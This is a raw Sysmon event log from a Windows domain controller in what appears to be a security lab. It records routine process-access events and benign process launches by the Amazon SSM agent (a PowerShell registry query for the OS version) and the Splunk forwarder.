13:34:19.994{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.994{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.992{59A5CD1D-8E5B-6005-5500-00000000A301}37483696C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.993{59A5CD1D-8E5B-6005-5F00-00000000A301}3424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'" "| Select-Object" "ProductName, BuildLabEx, CurrentMajorVersionNumber, CurrentMinorVersionNumber" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5E00-00000000A301}2144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5E00-00000000A301}2144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.970{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5B-6005-5E00-00000000A301}2144C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.973{59A5CD1D-8E5B-6005-5E00-00000000A301}2144C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.859{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5D00-00000000A301}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32